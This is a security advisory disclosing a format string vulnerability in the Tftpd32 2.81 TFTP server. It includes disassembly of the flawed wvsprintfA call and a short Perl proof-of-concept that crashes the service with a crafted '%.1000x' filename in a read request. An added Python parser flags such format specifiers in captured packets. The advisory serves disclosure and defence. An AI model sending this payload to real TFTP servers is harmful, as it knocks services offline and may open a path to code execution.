Critical security advisory #006
Tftpd32 2.81 Format String + DoS PoC

Critical Security - 22:03 2006.01.19
Critical Security research: http://www.critical.lt
Product site: http://tftpd32.jounin.net/
Credits: Critical Security Team (www.critical.lt)
Original Advisory: http://www.critical.lt/?vulnerabilities/200

Due to incorrect use of format strings there is a possibility of remote code execution. The vulnerability can be triggered by sending a SEND or GET request whose filename is a specially formatted string: the attacker-controlled request field reaches wvsprintfA as the format argument rather than as data.

Vulnerable code:

LEA ECX,DWORD PTR SS:[ESP+430]
LEA EAX,DWORD PTR SS:[ESP+1C]
PUSH ECX                                   ; /Arglist
PUSH EDX                                   ; |Format
PUSH EAX                                   ; |s = 00E6F4E8
CALL DWORD PTR DS:[<&USER32.wvsprintfA>]   ; \wvsprintfA

Proof of concept exploit: http://www.critical.lt/research/tftpd32_281_dos.txt

#!/usr/bin/perl
# Tftpd32 Format String PoC DoS by Critical Security research http://www.critical.lt
use strict;
use warnings;
use IO::Socket;

my $port = "69";
my $host = "127.0.0.1";

# UDP socket towards the TFTP service under test
my $tftpudp = IO::Socket::INET->new(
    PeerPort => $port,
    PeerAddr => $host,
    Proto    => 'udp',
) or die "cannot create UDP socket: $@";

# TFTP read request (opcode 1, "GET"): opcode, NUL-terminated filename, NUL-terminated mode
my $bzz = "\x00\x01";                        # RRQ opcode
$bzz   .= "%.1000x\x00";                     # filename carrying a format specifier
$bzz   .= "\x6F\x63\x74\x65\x74\x00";        # "octet" transfer mode

$tftpudp->send($bzz);
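The request layout the PoC relies on (opcode, NUL-terminated filename, NUL-terminated mode) is simple enough to inspect on the wire. The following is an added example, not code from the advisory or from the Tftpd32 project: a small Python parser for TFTP read/write requests that flags filename or mode fields carrying printf-style conversions and estimates how far they would expand. The function names, the generic printf-style regular expression (it is not tied to the subset of conversions wvsprintfA honors) and the sample packets are all my own constructions; the second sample packet reproduces the bytes the PoC above sends.

```python
# Added example (not part of the Critical Security advisory or of Tftpd32):
# inspect a TFTP RRQ/WRQ for format-string content in its text fields.
import re
import struct

OPCODES = {1: "RRQ", 2: "WRQ"}

# Generic printf-style conversion: % flags width .precision conversion.
# Assumption: this covers common C conversions and is not the exact set
# that wvsprintfA implements.
FORMAT_SPEC = re.compile(
    rb"%(?P<flags>[-+ #0]*)(?P<width>\d*)(?:\.(?P<prec>\d+))?"
    rb"(?P<conv>[diouxXeEfgGcspn%])"
)


def parse_tftp_request(packet: bytes) -> dict:
    """Split an RRQ/WRQ into opcode, filename and mode (RFC 1350 layout)."""
    if len(packet) < 2:
        raise ValueError("packet too short for an opcode")
    (opcode,) = struct.unpack("!H", packet[:2])
    if opcode not in OPCODES:
        raise ValueError(f"not a read/write request (opcode {opcode})")
    # A well-formed request ends with a NUL, so the split yields an empty tail.
    fields = packet[2:].split(b"\x00")
    if len(fields) < 3:
        raise ValueError("missing NUL-terminated filename or mode")
    return {"op": OPCODES[opcode], "filename": fields[0], "mode": fields[1]}


def format_specs(field: bytes) -> list:
    """Return (spec, minimum expansion in bytes) for each conversion, ignoring '%%'."""
    found = []
    for m in FORMAT_SPEC.finditer(field):
        if m.group("conv") == b"%":
            continue  # '%%' is a literal percent sign, not a conversion
        width = int(m.group("width") or 0)
        prec = int(m.group("prec") or 0)
        # A conversion produces at least max(width, precision) bytes, never zero.
        found.append((m.group(0), max(width, prec, 1)))
    return found


def inspect_request(packet: bytes) -> dict:
    """Parse the request and report any conversions found in filename or mode."""
    req = parse_tftp_request(packet)
    specs = []
    for name in ("filename", "mode"):
        for spec, min_len in format_specs(req[name]):
            specs.append((name, spec, min_len))
    req["specs"] = specs
    req["min_expansion"] = sum(s[2] for s in specs)
    req["suspicious"] = bool(specs)
    return req


if __name__ == "__main__":
    # Constructed sample packets: a normal read request and the PoC's bytes.
    samples = {
        "benign": b"\x00\x01" + b"boot.img\x00" + b"octet\x00",
        "poc": b"\x00\x01" + b"%.1000x\x00" + b"octet\x00",
    }
    for label, pkt in samples.items():
        r = inspect_request(pkt)
        print(label, r["op"], r["filename"], "suspicious" if r["suspicious"] else "ok",
              "min expansion:", r["min_expansion"])
```

Run it over packets captured on UDP/69 (or fed from a pcap) to see which requests would hand a conversion to the server's formatting call; the `min_expansion` figure is the part that matters for the crash case, since a field like `%.1000x` forces at least 1000 bytes of output into a fixed stack buffer.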